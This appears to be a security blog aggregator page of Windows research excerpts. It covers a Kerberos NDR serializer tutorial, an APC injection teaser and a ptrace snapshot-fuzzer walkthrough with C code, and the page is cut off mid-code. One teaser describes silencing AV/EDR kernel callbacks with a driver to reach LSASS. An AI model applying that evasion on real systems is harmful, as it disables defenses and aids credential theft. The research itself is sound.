Normal view

There are new articles available, click to refresh the page.

Before yesterdayWindows Exploitation

Winsider Seminars & Solutions Inc.
Critical, Protected, DUT Processes in Windows 10Yarden Shafir
3 August 2020 at 13:42

Critical, Protected, DUT Processes in Windows 10

Winsider Seminars & Solutions Inc.

By: Yarden Shafir

3 August 2020 at 13:42

[…]

Matteo Malvica
Silencing the EDR. How to disable process, threads and image-loading detection callbacks.
15 July 2020 at 00:00

Silencing the EDR. How to disable process, threads and image-loading detection callbacks.

Matteo Malvica

15 July 2020 at 00:00

Backround - TL;DR This post is about resuming the very inspiring Rui’s piece on Windows Kernel’s callbacks and taking it a little further by extending new functionalities and build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing LSASS loaded module or detect malicious activities. We’ll then use our evil driver to temporarily silence any registered AV’s callbacks and restore EDR original code once we are done with our task.

Winsider Seminars & Solutions Inc.
Secure Pool Internals : Dynamic KDP Behind The HoodYarden Shafir
13 July 2020 at 08:28

Secure Pool Internals : Dynamic KDP Behind The Hood

Winsider Seminars & Solutions Inc.

By: Yarden Shafir

13 July 2020 at 08:28

[…]

Tyranid's Lair
Generating NDR Type Serializers for C#tiraniddo
1 July 2020 at 21:32

Generating NDR Type Serializers for C#

Tyranid's Lair

By: tiraniddo

1 July 2020 at 21:32

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
typedef struct _TEST_TYPE
{
[unique, string] wchar_t* Name;
DWORD Value;
} TEST_TYPE;

}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders

{

typedef [encode, decode] TEST_TYPE;

}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers.

If you look at the Decode function when compiled for a X64 target it should look like the following:

void
TEST_TYPE_Decode(
handle_t _MidlEsHandle,
TEST_TYPE * _pType)
{
NdrMesTypeDecode3(
_MidlEsHandle,
( PMIDL_TYPE_PICKLING_INFO )&__MIDL_TypePicklingInfo,
&TypeEncoders_ProxyInfo,
TypePicklingOffsetTable,
0,
_pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:

The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more that one structure in a stream.
The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
The index of the type offset in the 4th parameter.
A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov [rsp+28h], r14 ; pObject
mov dword ptr [rsp+20h], 5 ; nTypeIndex
lea r9, off_1800F3138 ; ArrTypeOffset
lea r8, stru_1800D5EA0 ; pProxyInfo
lea rdx, stru_1800DEAF0 ; pPicklingInfo
mov rcx, [rsp+68h] ; Handle
call NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
-OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structured are wrapped inside a Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface no only can you avoid having to work out the offsets as Get-RpcServer will automatically find the location you can also use an additional feature to extract the type information from your private symbols to fixup the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
version(1.0),
]
interface RpcServer
{
int Test([in] handle_t hBinding,
[unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
delete[] p;
}

int Test(
handle_t hBinding,
PPAC_DEVICE_INFO device_info) {
printf("Test %p\n", device_info);
return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle called to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
handle_t _MidlEsHandle,
TEST_TYPE * _pType)
{
NdrMesTypeDecode2(
_MidlEsHandle,
( PMIDL_TYPE_PICKLING_INFO )&__MIDL_TypePicklingInfo,
&TypeEncoders_StubDesc,
( PFORMAT_STRING )&types__MIDL_TypeFormatString.Format[2],
_pType);
}

The serialization handle.
The MIDL_TYPE_PICKLING_INFO structure.
The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
A pointer into the format string for the start of the type.
A pointer to the structure to serialize or deserialize.

Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
-StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's a offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
-StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

Low Level Pleasure
APC Series: KiUserApcDispatcher and Wow64
28 June 2020 at 00:00

APC Series: KiUserApcDispatcher and Wow64

Low Level Pleasure

28 June 2020 at 00:00

I recommend to read the previous posts before reading this one: User APC API: We discussed the user mode API of user APC User APC Internals: We discussed the implementation of user APC in the kernel Let’s continue our discussion about APC internals in windows: This time we’ll discuss APC dispatching in user mode and how APC works in Wow64 processes: The evolution of KiUserApcDispatcher Modifications to APC functions to support Wow64 Wow64 APC injection techniques The evolution of KiUserApcDispatcher NTDLL contains a set of entry points that the kernel uses to run code in user mode like: KiUserExceptionDispatcher, KiUserCallbackDispatcher, …

The Human Machine Interface
Fuzzing Like A Caveman 4: Snapshot/Code Coverage Fuzzer!h0mbre
13 June 2020 at 04:00

Fuzzing Like A Caveman 4: Snapshot/Code Coverage Fuzzer!

The Human Machine Interface

By: h0mbre

13 June 2020 at 04:00

Introduction

Last time we blogged, we had a dumb fuzzer that would test an intentionally vulnerable program that would perform some checks on a file and if the input file passed a check, it would progress to the next check, and if the input passed all checks the program would segfault. We discovered the importance of code coverage and how it can help reduce exponentially rare occurences during fuzzing into linearly rare occurences. Let’s get right into how we improved our dumb fuzzer!

Big thanks to @gamozolabs for all of his content that got me hooked on the topic.

Performance

First things first, our dumb fuzzer was slow as hell. If you remember, we were averaging about 1,500 fuzz cases per second with our dumb fuzzer. During my testing, AFL in QEMU mode (simulating not having source code available for compilation instrumentation) was hovering around 1,000 fuzz cases per second. This makes sense, since AFL does way more than our dumb fuzzer, especially in QEMU mode where we are emulating a CPU and providing code coverage.

Our target binary (-> HERE <-) would do the following:

extract the bytes from a file on disk into a buffer
perform 3 checks on the buffer to see if the indexes that were checked matched hardcoded values
segfaulted if all checks were passed, exit if one of the checks failed

Our dumb fuzzer would do the following:

extract bytes from a valid jpeg on disk into a byte buffer
mutate 2% of the bytes in the buffer by random byte overwriting
write the mutated file to disk
feed the mutated file to the target binary by executing a fork() and execvp() each fuzzing iteration

As you can see, this is a lot of file system interactions and syscalls. Let’s use strace on our vulnerable binary and see what syscalls the binary makes (for this post, I’ve hardcoded the .jpeg file into the vulnerable binary so that we don’t have to use command line arguments for ease of testing):

execve("/usr/bin/vuln", ["vuln"], 0x7ffe284810a0 /* 52 vars */) = 0
brk(NULL)                               = 0x55664f046000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=88784, ...}) = 0
mmap(NULL, 88784, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0793d2e000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0793d2c000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f079372c000
mprotect(0x7f0793913000, 2097152, PROT_NONE) = 0
mmap(0x7f0793b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f0793b13000
mmap(0x7f0793b19000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0793b19000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7f0793d2d500) = 0
mprotect(0x7f0793b13000, 16384, PROT_READ) = 0
mprotect(0x55664dd97000, 4096, PROT_READ) = 0
mprotect(0x7f0793d44000, 4096, PROT_READ) = 0
munmap(0x7f0793d2e000, 88784)           = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55664f046000
brk(0x55664f067000)                     = 0x55664f067000
write(1, "[>] Analyzing file: Canon_40D.jp"..., 35[>] Analyzing file: Canon_40D.jpg.
) = 35
openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
lseek(3, 4096, SEEK_SET)                = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 3862) = 3862
lseek(3, 0, SEEK_SET)                   = 0
write(1, "[>] Canon_40D.jpg is 7958 bytes."..., 33[>] Canon_40D.jpg is 7958 bytes.
) = 33
read(3, "\377\330\377\340\0\20JFIF\0\1\1\1\0H\0H\0\0\377\341\t\254Exif\0\0II"..., 4096) = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 4096) = 3862
close(3)                                = 0
write(1, "[>] Check 1 no.: 2626\n", 22[>] Check 1 no.: 2626
) = 22
write(1, "[>] Check 2 no.: 3979\n", 22[>] Check 2 no.: 3979
) = 22
write(1, "[>] Check 3 no.: 5331\n", 22[>] Check 3 no.: 5331
) = 22
write(1, "[>] Check 1 failed.\n", 20[>] Check 1 failed.
)   = 20
write(1, "[>] Char was 00.\n", 17[>] Char was 00.
)      = 17
exit_group(-1)                          = ?
+++ exited with 255 +++

You can see that during the process of the target binary, we run plenty of code before we even open the input file. Looking through the strace output, we don’t even open the input file until we’ve run the following syscalls:

execve
brk
access
access
openat
fstat
mmap
close
access
openat
read
opeant
read
fstat
mmap
mmap
mprotect
mmap
mmap
arch_prctl
mprotect
mprotect
mprotect
munmap
fstat
brk
brk
write

After all of those syscalls, we finally open the file from the disk to read in the bytes with this line from the strace output:

openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3

So keep in mind, we run these syscalls every single fuzz iteration with our dumb fuzzer. Our dumb fuzzer (-> HERE <-) would write a file to disk every iteration, and spawn an instance of the target program with fork() + execvp(). The vulnerable binary would run all of the start up syscalls and finally read in the file from disk every iteration. So thats a couple dozen syscalls and two file system interactions every single fuzzing iteration. No wonder our dumb fuzzer was so slow.

Rudimentary Snapshot Mechanism

I started to think about how we could save time when fuzzing such a simple target binary and thought if I could just figure out how to take a snapshot of the program’s memory after it had already read the file off of disk and had stored the contents in its heap, I could just save that process state and manually insert a new fuzzcase in the place of the bytes that the target had read in and then have the program run until it reaches an exit() call. Once the target hits the exit call, I would rewind the program state to what it was when I captured the snapshot and insert a new fuzz case and then do it all over again.

You can see how this would improve performance. We would skip all of the target binary startup overhead and we would completely bypass all file system interactions. A huge difference would be we would only make one call to fork() which is an expensive syscall. For 100,000 fuzzing iterations let’s say, we’d go from 200,000 filesystem interactions (one for the dumb fuzzer to create a mutated.jpeg on disk, one for the target to read the mutated.jpeg) and 100,000 fork() calls to 0 file system interactions and only the initial fork().

In summary, our fuzzing process should look like this:

Start target binary, but break on first instruction before anything runs
Set breakpoints on a ‘start’ and ‘end’ location (start will be after the program reads in bytes from the file on disk, end will be the address of exit())
Run the program until it hits the ‘start’ breakpoint
Collect all writable memory sections of the process in a buffer
Capture all register states
Insert our fuzzcase into the heap overwriting the bytes that the program read in from file on disk
Resume target binary until it reaches ‘end’ breakpoint
Rewind process state to where it was at ‘start’
Repeat from step 6

We are only doing steps 1-5 only once, so this routine doesn’t need to be very fast. Steps 6-9 are where the fuzzer will spend 99% of its time so we need this to be fast.

Writing a Simple Debugger with Ptrace

In order to implement our snapshot mechanism, we’ll need to use the very intuitive, albeit apparently slow and restrictive, ptrace() interface. When I was getting started writing the debugger portion of the fuzzer a couple weeks ago, I leaned heavily on this blog post by Eli Bendersky which is a great introduction to ptrace() and shows you how to create a simple debugger.

Breakpoints

The debugger portion of our code doesn’t really need much functionality, it really only needs to be able to insert breakpoints and remove breakpoints. The way that you use ptrace() to set and remove breakpoints is to overwrite a single-byte instruction at at an address with the int3 opcode \xCC. However, if you just overwrite the value there while setting a breakpoint, it will be impossible to remove the breakpoint because you won’t know what value was held there originally and so you won’t know what to overwrite \xCC with.

To begin using ptrace(), we spawn a second process with fork().

pid_t child_pid = fork();
if (child_pid == 0) {
    //we're the child process here
    execute_debugee(debugee);
}

Now we need to have the child process volunteer to be ‘traced’ by the parent process. This is done with the PTRACE_TRACEME argument, which we’ll use inside our execute_debugee function:

// request via PTRACE_TRACEME that the parent trace the child
long ptrace_result = ptrace(PTRACE_TRACEME, 0, 0, 0);
if (ptrace_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("ptrace");
    exit(errno);
}

The rest of the function doesn’t involve ptrace but I’ll go ahead and show it here because there is an important function to forcibly disable ASLR in the debuggee process. This is crucial as we’ll be leverage breakpoints at static addresses that cannot change process to process. We disable ASLR by calling personality() with ADDR_NO_RANDOMIZE. Separately, we’ll route stdout and stderr to /dev/null so that we don’t muddy our terminal with the target binary’s output.

// disable ASLR
int personality_result = personality(ADDR_NO_RANDOMIZE);
if (personality_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("personality");
    exit(errno);
}
 
// dup both stdout and stderr and send them to /dev/null
int fd = open("/dev/null", O_WRONLY);
dup2(fd, 1);
dup2(fd, 2);
close(fd);
 
// exec our debugee program, NULL terminated to avoid Sentinel compilation
// warning. this replaces the fork() clone of the parent with the 
// debugee process 
int execl_result = execl(debugee, debugee, NULL);
if (execl_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("execl");
    exit(errno);
}

So first thing’s first, we need a way to grab the one-byte value at an address before we insert our breakpoint. For the fuzzer, I developed a header file and source file I called ptrace_helpers to help ease the development process of using ptrace(). To grab the value, we’ll grab the 64-bit value at the address but only care about the byte all the way to the right. (I’m using the type long long unsigned because that’s how register values are defined in <sys/user.h> and I wanted to keep everything the same).

long long unsigned get_value(pid_t child_pid, long long unsigned address) {
    
    errno = 0;
    long long unsigned value = ptrace(PTRACE_PEEKTEXT, child_pid, (void*)address, 0);
    if (value == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return value;	
}

So this function will use the PTRACE_PEEKTEXT argument to read the value located at address in the child process (child_pid) which is our target. So now that we have this value, we can save it off and insert our breakpoint with the following code:

void set_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    long long unsigned breakpoint = (original_value & 0xFFFFFFFFFFFFFF00 | 0xCC);
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)breakpoint);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

You can see that this function will take our original value that we gathered with the previous function and performs two bitwise operations to keep the first 7 bytes intact but then replace the last byte with \xCC. Notice that we are now using PTRACE_POKETEXT. One of the frustrating features of the ptrace() interface is that we can only read and write 8 bytes at a time!

So now that we can set breakpoints, the last function we need to implement is one to remove breakpoints, which would entail overwriting the int3 with the original byte value.

void revert_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)original_value);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

Again, using PTRACE_POKETEXT, we can overwrite the \xCC with the original byte value. So now we have the ability to set and remove breakpoints.

Lastly, we’ll need a way to resume execution in the debuggee. This can be accomplished by utilizing the PTRACE_CONT argument in ptrace() as follows:

void resume_execution(pid_t child_pid) {

    int ptrace_result = ptrace(PTRACE_CONT, child_pid, 0, 0);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

An important thing to note is, if we hit a breakpoint at address 0x000000000000000, rip will actually be at 0x0000000000000001. So after reverting our overwritten instruction to its previous value, we’ll also need to subtract 1 from rip before resuming execution, we’ll learn how to do this via ptrace in the next section.

Let’s now learn how we can utilize ptrace and the /proc pseudo files to create a snapshot of our target!

Snapshotting with ptrace and /proc

Register States

Another cool feature of ptrace() is the ability to capture and set register states in a debuggee process. We can do both of those things respectively with the helper functions I placed in ptrace_helpers.c:

// retrieve register states
struct user_regs_struct get_regs(pid_t child_pid, struct user_regs_struct registers) {                                                                                                 
    int ptrace_result = ptrace(PTRACE_GETREGS, child_pid, 0, &registers);                                                                              
    if (ptrace_result == -1) {                                                                              
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);                                                                         
        perror("ptrace");                                                                              
        exit(errno);                                                                              
    }

    return registers;                                                                              
}

// set register states
void set_regs(pid_t child_pid, struct user_regs_struct registers) {

    int ptrace_result = ptrace(PTRACE_SETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

The struct user_regs_struct is defined in <sys/user.h>. You can see we use PTRACE_GETREGS and PTRACE_SETREGS respectively to retrieve register data and set register data. So with these two functions, we’ll be able to create a struct user_regs_struct of snapshot register values when we are sitting at our ‘start’ breakpoint and when we reach our ‘end’ breakpoint, we’ll be able to revert the register states (most imporantly rip) to what they were when snapshotted.

Snapshotting Writable Memory Sections with /proc

Now that we have a way to capture register states, we’ll need a way to capture writable memory states for our snapshot. I did this by interacting with the /proc pseudo files. I used GDB to break on the first function that peforms a check in vuln, importantly this function is after vuln reads the jpeg off disk and will serve as our ‘start’ breakpoint. Once we break here in GDB, we can cat the /proc/$pid/maps file to get a look at how memory is mapped in the process (keep in mind GDB also forces ASLR off using the same method we did in our debugger). We can see the output here grepping for writable sections (ie, sections that could be clobbered during our fuzzcase run):

h0mbre@pwn:~/fuzzing/dragonfly_dir$ cat /proc/12011/maps | grep rw
555555756000-555555757000 rw-p 00002000 08:01 786686                     /home/h0mbre/fuzzing/dragonfly_dir/vuln
555555757000-555555778000 rw-p 00000000 00:00 0                          [heap]
7ffff7dcf000-7ffff7dd1000 rw-p 001eb000 08:01 1055012                    /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7dd1000-7ffff7dd5000 rw-p 00000000 00:00 0 
7ffff7fe0000-7ffff7fe2000 rw-p 00000000 00:00 0 
7ffff7ffd000-7ffff7ffe000 rw-p 00028000 08:01 1054984                    /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]

So that’s seven distinct sections of memory. You’ll notice that the heap is one of the sections. It is important to realize that our fuzzcase will be inserted into the heap, but the address in the heap that stores the fuzzcase will not be the same in our fuzzer as it is in GDB. This is likely due to some sort of environment variable difference between the two debuggers I think. If we look in GDB when we break on check_one() in vuln, we see that rax is a pointer to the beginning of our input, in this case the Canon_40D.jpg.

$rax   : 0x00005555557588b0  →  0x464a1000e0ffd8ff

That pointer, 0x00005555557588b0, is located in the heap. So all I had to do to find out where that pointer was in our debugger/fuzzer, was just break at the same point and use ptrace() to retrieve the rax value.

I would break on check_one and then open /proc/$pid/maps to get the offsets within the program that contain writable memory sections, and then I would open /proc/$pid/mem and read from those offsets into a buffer to store the writable memory. This code was stored in a source file called snapshot.c which contained some definitions and functions to both capture snapshots and restore them. For this part, capturing writable memory, I used the following definitions and function:

unsigned char* create_snapshot(pid_t child_pid) {
 
    struct SNAPSHOT_MEMORY read_memory = {
        {
            // maps_offset
            0x555555756000,
            0x7ffff7dcf000,
            0x7ffff7dd1000,
            0x7ffff7fe0000,
            0x7ffff7ffd000,
            0x7ffff7ffe000,
            0x7ffffffde000
        },
        {
            // snapshot_buf_offset
            0x0,
            0xFFF,
            0x2FFF,
            0x6FFF,
            0x8FFF,
            0x9FFF,
            0xAFFF
        },
        {
            // rdwr length
            0x1000,
            0x2000,
            0x4000,
            0x2000,
            0x1000,
            0x1000,
            0x21000
        }
    };  
 
    unsigned char* snapshot_buf = (unsigned char*)malloc(0x2C000);
 
    // this is just /proc/$pid/mem
    char proc_mem[0x20] = { 0 };
    sprintf(proc_mem, "/proc/%d/mem", child_pid);
 
    // open /proc/$pid/mem for reading
    // hardcoded offsets are from typical /proc/$pid/maps at main()
    int mem_fd = open(proc_mem, O_RDONLY);
    if (mem_fd == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("open");
        exit(errno);
    }
 
    // this loop will:
    //  -- go to an offset within /proc/$pid/mem via lseek()
    //  -- read x-pages of memory from that offset into the snapshot buffer
    //  -- adjust the snapshot buffer offset so nothing is overwritten in it
    int lseek_result, bytes_read;
    for (int i = 0; i < 7; i++) {
        //printf("dragonfly> Reading from offset: %d\n", i+1);
        lseek_result = lseek(mem_fd, read_memory.maps_offset[i], SEEK_SET);
        if (lseek_result == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("lseek");
            exit(errno);
        }
 
        bytes_read = read(mem_fd,
            (unsigned char*)(snapshot_buf + read_memory.snapshot_buf_offset[i]),
            read_memory.rdwr_length[i]);
        if (bytes_read == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("read");
            exit(errno);
        }
    }
 
    close(mem_fd);
    return snapshot_buf;
}

You can see that I hardcoded all the offsets and the lengths of the sections. Keep in mind, this doesn’t need to be fast. We’re only capturing a snapshot once, so it’s ok to interact with the file system. So we’ll loop through these 7 offsets and lengths and write them all into a buffer called snapshot_buf which will be stored in our fuzzer’s heap. So now we have both the register states and the memory states of our process as it begins check_one (our ‘start’ breakpoint).

Let’s now figure out how to restore the snapshot when we reach our ‘end’ breakpoint.

Restoring Snapshot

To restore the process memory state, we could just write to /proc/$pid/mem the same way we read from it; however, this portion needs to be fast since we are doing this every fuzzing iteration now. Iteracting with the file system every fuzzing iteration will slow us down big time. Luckily, since Linux kernel version 3.2, there is support for a much faster, process-to-process, memory reading/writing API that we can leverage called process_vm_writev(). Since this process works directly with another process and doesn’t traverse the kernel and doesn’t involve the file system, it will greatly increase our write speeds.

It’s kind of confusing looking at first but the man page example is really all you need to understand how it works, I’ve opted to just hardcode all of the offsets since this fuzzer is simply a POC. and we can restore the writable memory as follows:

void restore_snapshot(unsigned char* snapshot_buf, pid_t child_pid) {
 
    ssize_t bytes_written = 0;
    // we're writing *from* 7 different offsets within snapshot_buf
    struct iovec local[7];
    // we're writing *to* 7 separate sections of writable memory here
    struct iovec remote[7];
 
    // this struct is the local buffer we want to write from into the 
    // struct that is 'remote' (ie, the child process where we'll overwrite
    // all of the non-heap writable memory sections that we parsed from 
    // proc/$pid/memory)
    local[0].iov_base = snapshot_buf;
    local[0].iov_len = 0x1000;
    local[1].iov_base = (unsigned char*)(snapshot_buf + 0xFFF);
    local[1].iov_len = 0x2000;
    local[2].iov_base = (unsigned char*)(snapshot_buf + 0x2FFF);
    local[2].iov_len = 0x4000;
    local[3].iov_base = (unsigned char*)(snapshot_buf + 0x6FFF);
    local[3].iov_len = 0x2000;
    local[4].iov_base = (unsigned char*)(snapshot_buf + 0x8FFF);
    local[4].iov_len = 0x1000;
    local[5].iov_base = (unsigned char*)(snapshot_buf + 0x9FFF);
    local[5].iov_len = 0x1000;
    local[6].iov_base = (unsigned char*)(snapshot_buf + 0xAFFF);
    local[6].iov_len = 0x21000;
 
    // just hardcoding the base addresses that are writable memory
    // that we gleaned from /proc/pid/maps and their lengths
    remote[0].iov_base = (void*)0x555555756000;
    remote[0].iov_len = 0x1000;
    remote[1].iov_base = (void*)0x7ffff7dcf000;
    remote[1].iov_len = 0x2000;
    remote[2].iov_base = (void*)0x7ffff7dd1000;
    remote[2].iov_len = 0x4000;
    remote[3].iov_base = (void*)0x7ffff7fe0000;
    remote[3].iov_len = 0x2000;
    remote[4].iov_base = (void*)0x7ffff7ffd000;
